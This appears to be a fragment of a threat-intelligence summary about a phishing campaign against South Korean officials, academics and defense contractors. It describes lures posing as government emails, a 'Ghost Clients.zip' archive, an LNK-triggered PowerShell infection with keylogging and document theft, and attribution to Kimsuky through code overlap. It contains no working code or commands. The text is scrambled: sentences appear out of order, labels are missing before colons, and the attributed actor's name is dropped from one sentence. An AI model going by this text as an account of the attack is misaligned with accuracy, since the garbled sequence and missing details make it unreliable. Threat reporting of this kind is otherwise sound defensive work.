: The email contained a link to a cloud storage service (like Google Drive or OneDrive) or an attachment titled Ghost Clients.zip .
: The emails often masqueraded as legitimate communications from South Korean government agencies or think tanks.
The attack typically began with emails directed at high-value targets in South Korea, including government officials, academics, and defense contractors.
: Recording every keystroke to capture login credentials and private communications.
Once a user executed the LNK file, a complex, scripted infection process was triggered to bypass security software:
: Searching for and uploading documents with specific extensions (e.g., .hwp—a common Korean word processor format, .doc, .pdf).
: The PowerShell scripts used in Ghost Clients.zip shared significant code blocks with previously documented Kimsuky malware like AppleSeed and Alphabat .
Security researchers attributed this campaign to based on several "fingerprints" found in the code: